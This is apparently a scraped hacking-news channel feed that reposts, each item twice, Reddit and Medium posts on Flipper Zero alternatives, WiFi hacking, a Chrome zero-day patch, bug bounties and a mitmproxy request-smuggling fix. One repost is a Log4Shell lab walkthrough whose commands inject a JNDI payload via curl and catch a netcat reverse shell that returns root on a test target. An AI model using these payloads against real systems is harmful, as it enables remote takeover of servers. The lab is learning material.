hacking: security in practice
Flipper zero alternatives?
Hey everyone, I’ve heard of a new device called flipper zero, marketed as a hackers multi tool. I think I would find it very useful, however I have two issues with it. Mostly I hate the design and dolphin theme, I’d want something more sleek and professional looking, and secondly I feel like it’s a little pricey, although I still think it would be worth the price if there wasn’t cheaper alternatives, a cheaper one would obviously be better. So does anyone know if there are more professional looking and maybe cheaper options to the flipper zero?
submitted by /u/sccount125
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Flipper zero alternatives?
Hey everyone, I’ve heard of a new device called flipper zero, marketed as a hackers multi tool. I think I would find it very useful, however I have two issues with it. Mostly I hate the design and dolphin theme, I’d want something more sleek and professional looking, and secondly I feel like it’s a little pricey, although I still think it would be worth the price if there wasn’t cheaper alternatives, a cheaper one would obviously be better. So does anyone know if there are more professional looking and maybe cheaper options to the flipper zero?
submitted by /u/sccount125
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reddit
r/hacking on Reddit: Flipper zero alternatives?
Posted by u/sccount125 - 30 votes and 30 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Tutorial - Automated WiFi Hacking
After getting lots of positive feedback about my automated WiFi hacking script I decided to make a tutorial that breaks down exactly what this attack is, how to setup, run & a code breakdown. Hope y'all enjoy. https://youtu.be/xFT-1oJLVmo
submitted by /u/BradPittOfTheOffice
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Tutorial - Automated WiFi Hacking
After getting lots of positive feedback about my automated WiFi hacking script I decided to make a tutorial that breaks down exactly what this attack is, how to setup, run & a code breakdown. Hope y'all enjoy. https://youtu.be/xFT-1oJLVmo
submitted by /u/BradPittOfTheOffice
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reddit
From the hacking community on Reddit: Tutorial - Automated WiFi Hacking
Explore this post and more from the hacking community
hacking: security in practice
How did they do it?
I was on Omegle( I know a mistake in the first place) and as I was talking to someone they said that they were going to turn off my wifi and did a 5-second countdown. Well, my wifi did turn off I'm just wondering what they did.
submitted by /u/studybandit
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How did they do it?
I was on Omegle( I know a mistake in the first place) and as I was talking to someone they said that they were going to turn off my wifi and did a 5-second countdown. Well, my wifi did turn off I'm just wondering what they did.
submitted by /u/studybandit
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How did they do it?
I was on Omegle( I know a mistake in the first place) and as I was talking to someone they said that they were going to turn off my wifi and did a...
Hacking on Medium
Pickle Rick — Write up TryHackMe. [PT/BR]
https://cdn-images-1.medium.com/max/1440/1*b4UtS4qKmbsZk_flSfdOGA.png
Este desafio temático de Rick e Morty exige que você explore um servidor da web para encontrar 3 ingredientes que ajudarão Rick a fazer…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Pickle Rick — Write up TryHackMe. [PT/BR]
https://cdn-images-1.medium.com/max/1440/1*b4UtS4qKmbsZk_flSfdOGA.png
Este desafio temático de Rick e Morty exige que você explore um servidor da web para encontrar 3 ingredientes que ajudarão Rick a fazer…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Pickle Rick — Write up TryHackMe. [PT/BR]
Este desafio temático de Rick e Morty exige que você explore um servidor da web para encontrar 3 ingredientes que ajudarão Rick a fazer…
hacking: security in practice
Hacking capture the flag
Hey all, I am trying to get a hacking capture the flag thing going in the bay area if anyone is interested? It's essentially capture the flag but with a file stored on a computer that you have to retrieve through hacking.
submitted by /u/onrop4life
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Hacking capture the flag
Hey all, I am trying to get a hacking capture the flag thing going in the bay area if anyone is interested? It's essentially capture the flag but with a file stored on a computer that you have to retrieve through hacking.
submitted by /u/onrop4life
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Hacking capture the flag
Hey all, I am trying to get a hacking capture the flag thing going in the bay area if anyone is interested? It's essentially capture the flag but...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Google Issues Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability. CVE-2022-1096 is the second zero-day vulnerability addressed by Google in Chrome since the start of the year.
https://external-preview.redd.it/2U9J_1ec9Sb90d2vXaibCJi-8ZS1EnVsL97HBWLLWVU.jpg?width=640&crop=smart&auto=webp&s=a5785a74f798be2071b0dc339e82d02bf8c8847a submitted by /u/Late_Ice_9288
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Google Issues Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability. CVE-2022-1096 is the second zero-day vulnerability addressed by Google in Chrome since the start of the year.
https://external-preview.redd.it/2U9J_1ec9Sb90d2vXaibCJi-8ZS1EnVsL97HBWLLWVU.jpg?width=640&crop=smart&auto=webp&s=a5785a74f798be2071b0dc339e82d02bf8c8847a submitted by /u/Late_Ice_9288
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Google Issues Urgent Chrome Update to Patch Actively Exploited...
Posted in r/hacking by u/Late_Ice_9288 • 1 point and 0 comments
Google Dork for instant bounties
Google dorks that’ll get you instant bounties, proven and tested multiple times.Continue reading on Medium »
Read more...
Google dorks that’ll get you instant bounties, proven and tested multiple times.Continue reading on Medium »
Read more...
Google Dork for instant bounties
https://debprasadbanerjee502.medium.com/google-dork-for-instant-bounties-a332764fc3e2?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://debprasadbanerjee502.medium.com/google-dork-for-instant-bounties-a332764fc3e2?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Google Dork for instant bounties
Google dorks that’ll get you instant bounties, proven and tested multiple times.
Google dorks that’ll get you instant bounties, proven and tested multiple times.Continue reading on Medium » (https://debprasadbanerjee502.medium.com/google-dork-for-instant-bounties-a332764fc3e2?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Google Dork for instant bounties
Google dorks that’ll get you instant bounties, proven and tested multiple times.
Hacking on Medium
Revest Finance incident analysis
https://cdn-images-1.medium.com/max/820/1*bCepyjBfT9smvZEErFVf5g.png
The SlowMist security team conducted an analysis of the situation.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Revest Finance incident analysis
https://cdn-images-1.medium.com/max/820/1*bCepyjBfT9smvZEErFVf5g.png
The SlowMist security team conducted an analysis of the situation.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Revest Finance incident analysis
The SlowMist security team conducted an analysis of the situation.
How to find your first pentester freelance job
https://www.reddit.com/r/Pentesting/comments/tq2r5d/how_to_find_your_first_pentester_freelance_job/
Imgine the following profile: infosec certs (e.g. OSCP), good profile at THM and HTB, bachelor and master degrees in CS, many years in IT as a software engineer. I wonder how such a profile would start their career as a freelance pentester? Where to look for the first client? submitted by /u/andy-codes (https://www.reddit.com/user/andy-codes)
[link] (https://www.reddit.com/r/Pentesting/comments/tq2r5d/how_to_find_your_first_pentester_freelance_job/) [comments] (https://www.reddit.com/r/Pentesting/comments/tq2r5d/how_to_find_your_first_pentester_freelance_job/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/tq2r5d/how_to_find_your_first_pentester_freelance_job/
Imgine the following profile: infosec certs (e.g. OSCP), good profile at THM and HTB, bachelor and master degrees in CS, many years in IT as a software engineer. I wonder how such a profile would start their career as a freelance pentester? Where to look for the first client? submitted by /u/andy-codes (https://www.reddit.com/user/andy-codes)
[link] (https://www.reddit.com/r/Pentesting/comments/tq2r5d/how_to_find_your_first_pentester_freelance_job/) [comments] (https://www.reddit.com/r/Pentesting/comments/tq2r5d/how_to_find_your_first_pentester_freelance_job/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
How to find your first pentester freelance job
Imgine the following profile: infosec certs (e.g. OSCP), good profile at THM and HTB, bachelor and master degrees in CS, many years in IT as a...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Is code breaking related to hacking?
https://external-preview.redd.it/g9aR8PNneJLKO3IkltdsFW8ZOX77t-pcloSVZ2JPOVE.jpg?width=640&crop=smart&auto=webp&s=c479d2407bb83e6bcfc2d875f54802276e26135b submitted by /u/soliev
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Is code breaking related to hacking?
https://external-preview.redd.it/g9aR8PNneJLKO3IkltdsFW8ZOX77t-pcloSVZ2JPOVE.jpg?width=640&crop=smart&auto=webp&s=c479d2407bb83e6bcfc2d875f54802276e26135b submitted by /u/soliev
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Is code breaking related to hacking?
Posted in r/hacking by u/soliev • 1 point and 0 comments
log4j shell poc with User-Agent payload
https://www.reddit.com/r/Pentesting/comments/tq3bff/log4j_shell_poc_with_useragent_payload/
* Note: I found that log4j payload is not allowed to be written here in reddit, so I replace it with PAYLOADHERE keyword. In short, PAYLOADHERE = jndi:ldap If you want to see the full content, I've copied it to pastebin https://pastebin.com/Uge5Rk2H This lab has been created based on the following vulnerable docker image for log4j: https://github.com/kozmer/log4j-shell-poc (go ahead and try it to reproduce this issue) Lab setup Install vulnerable docker application on TARGET and run it TARGET$ git clone https://github.com/kozmer/log4j-shell-poc TARGET$ cd log4j-shell-poc TARGET$ docker build -t log4j-shell-poc . TARGET$ docker run --network host log4j-shell-poc Prepare POC on TESTER TESTER:~$ git clone https://github.com/kozmer/log4j-shell-poc TESTER:~$ cd log4j-shell-poc TESTER:~$ pip install -r requirements.txt TESTER:~/log4j-shell-poc$ python3 poc.py --userip TESTER --webport 8000 --lport 9001 [!] CVE: CVE-2021-44228 [!] Github repo: https://github.com/kozmer/log4j-shell-poc [+] Exploit java class created success [+] Setting up LDAP server [+] Send me: ${PAYLOADHERE://TESTER:1389/a} [+] Starting Webserver on port 8000 http://0.0.0.0:8000 Listening on 0.0.0.0:1389 Start a netcat listener to accept reverse shell connection TESTER:~$ nc -lvnp 9001 Use curl/browser to send data back to the TESTER-1 TESTER:~$ curl -d 'uname=${PAYLOADHERE://TESTER:1389/a}&password=' http://TARGET:8080/login Check netcat again TESTER:~$ nc -lvnp 9001 listening on [any] 9001 ... connect to [TESTER] from (UNKNOWN) [TARGET] 36422 id uid=0(root) gid=0(root) groups=0(root) hostname TARGET Test completed successfully. However, instead of sending data to login form, I've decided to try again using different entry point which is via User-Agent. This is my payload TESTER:~$ curl -H 'User-Agent: ${PAYLOADHERE://TESTER:1389/a}' http://TARGET:8080 .... However, I did not get any connection to my netcat listener via this way. What's wrong in this payload and how to fix it? submitted by /u/w0lfcat (https://www.reddit.com/user/w0lfcat)
[link] (https://www.reddit.com/r/Pentesting/comments/tq3bff/log4j_shell_poc_with_useragent_payload/) [comments] (https://www.reddit.com/r/Pentesting/comments/tq3bff/log4j_shell_poc_with_useragent_payload/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/tq3bff/log4j_shell_poc_with_useragent_payload/
* Note: I found that log4j payload is not allowed to be written here in reddit, so I replace it with PAYLOADHERE keyword. In short, PAYLOADHERE = jndi:ldap If you want to see the full content, I've copied it to pastebin https://pastebin.com/Uge5Rk2H This lab has been created based on the following vulnerable docker image for log4j: https://github.com/kozmer/log4j-shell-poc (go ahead and try it to reproduce this issue) Lab setup Install vulnerable docker application on TARGET and run it TARGET$ git clone https://github.com/kozmer/log4j-shell-poc TARGET$ cd log4j-shell-poc TARGET$ docker build -t log4j-shell-poc . TARGET$ docker run --network host log4j-shell-poc Prepare POC on TESTER TESTER:~$ git clone https://github.com/kozmer/log4j-shell-poc TESTER:~$ cd log4j-shell-poc TESTER:~$ pip install -r requirements.txt TESTER:~/log4j-shell-poc$ python3 poc.py --userip TESTER --webport 8000 --lport 9001 [!] CVE: CVE-2021-44228 [!] Github repo: https://github.com/kozmer/log4j-shell-poc [+] Exploit java class created success [+] Setting up LDAP server [+] Send me: ${PAYLOADHERE://TESTER:1389/a} [+] Starting Webserver on port 8000 http://0.0.0.0:8000 Listening on 0.0.0.0:1389 Start a netcat listener to accept reverse shell connection TESTER:~$ nc -lvnp 9001 Use curl/browser to send data back to the TESTER-1 TESTER:~$ curl -d 'uname=${PAYLOADHERE://TESTER:1389/a}&password=' http://TARGET:8080/login Check netcat again TESTER:~$ nc -lvnp 9001 listening on [any] 9001 ... connect to [TESTER] from (UNKNOWN) [TARGET] 36422 id uid=0(root) gid=0(root) groups=0(root) hostname TARGET Test completed successfully. However, instead of sending data to login form, I've decided to try again using different entry point which is via User-Agent. This is my payload TESTER:~$ curl -H 'User-Agent: ${PAYLOADHERE://TESTER:1389/a}' http://TARGET:8080 .... However, I did not get any connection to my netcat listener via this way. What's wrong in this payload and how to fix it? submitted by /u/w0lfcat (https://www.reddit.com/user/w0lfcat)
[link] (https://www.reddit.com/r/Pentesting/comments/tq3bff/log4j_shell_poc_with_useragent_payload/) [comments] (https://www.reddit.com/r/Pentesting/comments/tq3bff/log4j_shell_poc_with_useragent_payload/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
log4j shell poc with User-Agent payload
\* Note: I found that log4j payload is not allowed to be written here in reddit, so I replace it with `PAYLOADHERE` keyword. In short,...
One-liner Bug Bounty Tips
A collection of awesome one-liner scripts especially for bug bounty.Continue reading on Medium »
Read more...
A collection of awesome one-liner scripts especially for bug bounty.Continue reading on Medium »
Read more...
One-liner Bug Bounty Tips
https://thenurhabib.medium.com/one-liner-bug-bounty-tips-fa386b756e16?source=rss------bug_bounty-5
A collection of awesome one-liner scripts especially for bug bounty.Continue reading on Medium » (https://thenurhabib.medium.com/one-liner-bug-bounty-tips-fa386b756e16?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
https://thenurhabib.medium.com/one-liner-bug-bounty-tips-fa386b756e16?source=rss------bug_bounty-5
A collection of awesome one-liner scripts especially for bug bounty.Continue reading on Medium » (https://thenurhabib.medium.com/one-liner-bug-bounty-tips-fa386b756e16?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
One-liner Bug Bounty Tips
A collection of awesome one-liner scripts especially for bug bounty.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
HTTP request smuggling bug patched in mitmproxy
HTTP request smuggling bug patched in mitmproxyPost Views: 3
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/Patreon.png
Reading Time: 2 Minutes
Mitmproxy, an open source, interactive HTTPS proxy service, has patched a dangerous bug that potentially allowed attackers to stage HTTP request smuggling attacks against backend servers. HTTP request smuggling attacks exploit the inconsistencies between the way intermediary and backend servers process requests to bypass security controls, gain unauthorized access to sensitive data, or compromise other application users. An elusive bugZhang Zeyu, the security researcher who reported the bug, discovered that an attacker could smuggle a request/response through mitmproxy as part of another request/response’s HTTP message body.
“While the more obvious attack vectors (e.g., double Content-Length headers, using Content-Length over Transfer-Encoding) are rare nowadays, more subtle deviations from the standard leave certain setups equally vulnerable to request smuggling,” he told The Daily Swig.
In the case of mitmproxy, an issue with the parsing of whitespace in header names resulted in mitmproxy and a downstream server possibly having different interpretations of HTTP headers.
“Eliminating this type of vulnerability is very tricky as you need different HTTP implementations (proxy and target server) to agree on a common interpretation of HTTP messages,” Maximilian Hils, the maintainer of mitmproxy, told The Daily Swig.
Alternatively, you can make the proxy reject potentially malformed messages, but that would have the drawback of imposing compatibility problems with clients in the wild, Hils said.
“This is not a buffer overflow, which has an obvious fix. There are a lot of nuances here to make sure that intermediary and servers agree,” he said.
See Also: Complete Offensive Security and Ethical Hacking Course
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Solutions-1.png HTTP/2 not affectedThe bug only works against HTTP/1 services behind mitmproxy, which currently accounts for a very small number of web servers.
HTTP/2, the more commonly used protocol, does not rely on the use of Content-Length and Transfer-Encoding headers to determine where a request body ends.
Instead, a built-in length field is included in each data frame, and when proxies communicate with backends using HTTP/2, there is little ambiguity on the length of each message. Therefore, this particular request smuggling bug would be ineffective against HTTP/2 services.
HTTP/1 services that follow the RFC7230 specification and reject headers with whitespace would also be immune against the request smuggling bug found in mitmproxy. The security bug would also be useless to attackers if the target web application is not vulnerable in some other way.
“From a practical point of view, I’d argue that the impact is non-existent for the vast majority of users,” Hils said. “There are a lot of not-so-common preconditions that need to be met. I’d say quite a few stars need to align for this to have an actual impact in the wild.”
See Also: Kali Linux 2022.1 Release with Visual Updates, New Tools, Legacy SSH Edge casesBut Zeyu warned that many backend servers still fail to support HTTP/2, including Gunicorn, which serves many Python-based applications. And in many cases, services that support HTTP/2 are not configured to use it between the frontend proxy and the backend servers simply because most clients would not notice the difference, according to Zeyu.
“This means that there are still a lot of web proxy and server configurations that speak HTTP/2 between the client and the proxy but HTTP/1.x between the prox[...]
___________________________
@hacking_Attack
@Hacking_Video
HTTP request smuggling bug patched in mitmproxy
HTTP request smuggling bug patched in mitmproxyPost Views: 3
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/Patreon.png
Reading Time: 2 Minutes
Mitmproxy, an open source, interactive HTTPS proxy service, has patched a dangerous bug that potentially allowed attackers to stage HTTP request smuggling attacks against backend servers. HTTP request smuggling attacks exploit the inconsistencies between the way intermediary and backend servers process requests to bypass security controls, gain unauthorized access to sensitive data, or compromise other application users. An elusive bugZhang Zeyu, the security researcher who reported the bug, discovered that an attacker could smuggle a request/response through mitmproxy as part of another request/response’s HTTP message body.
“While the more obvious attack vectors (e.g., double Content-Length headers, using Content-Length over Transfer-Encoding) are rare nowadays, more subtle deviations from the standard leave certain setups equally vulnerable to request smuggling,” he told The Daily Swig.
In the case of mitmproxy, an issue with the parsing of whitespace in header names resulted in mitmproxy and a downstream server possibly having different interpretations of HTTP headers.
“Eliminating this type of vulnerability is very tricky as you need different HTTP implementations (proxy and target server) to agree on a common interpretation of HTTP messages,” Maximilian Hils, the maintainer of mitmproxy, told The Daily Swig.
Alternatively, you can make the proxy reject potentially malformed messages, but that would have the drawback of imposing compatibility problems with clients in the wild, Hils said.
“This is not a buffer overflow, which has an obvious fix. There are a lot of nuances here to make sure that intermediary and servers agree,” he said.
See Also: Complete Offensive Security and Ethical Hacking Course
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Solutions-1.png HTTP/2 not affectedThe bug only works against HTTP/1 services behind mitmproxy, which currently accounts for a very small number of web servers.
HTTP/2, the more commonly used protocol, does not rely on the use of Content-Length and Transfer-Encoding headers to determine where a request body ends.
Instead, a built-in length field is included in each data frame, and when proxies communicate with backends using HTTP/2, there is little ambiguity on the length of each message. Therefore, this particular request smuggling bug would be ineffective against HTTP/2 services.
HTTP/1 services that follow the RFC7230 specification and reject headers with whitespace would also be immune against the request smuggling bug found in mitmproxy. The security bug would also be useless to attackers if the target web application is not vulnerable in some other way.
“From a practical point of view, I’d argue that the impact is non-existent for the vast majority of users,” Hils said. “There are a lot of not-so-common preconditions that need to be met. I’d say quite a few stars need to align for this to have an actual impact in the wild.”
See Also: Kali Linux 2022.1 Release with Visual Updates, New Tools, Legacy SSH Edge casesBut Zeyu warned that many backend servers still fail to support HTTP/2, including Gunicorn, which serves many Python-based applications. And in many cases, services that support HTTP/2 are not configured to use it between the frontend proxy and the backend servers simply because most clients would not notice the difference, according to Zeyu.
“This means that there are still a lot of web proxy and server configurations that speak HTTP/2 between the client and the proxy but HTTP/1.x between the prox[...]
___________________________
@hacking_Attack
@Hacking_Video
Black Hat Ethical Hacking
HTTP request smuggling bug patched in mitmproxy | Black Hat Ethical Hacking
Mitmproxy, an open source, interactive HTTPS proxy service, has patched a dangerous bug that potentially allowed attackers to stage HTTP request smuggling attacks against backend servers.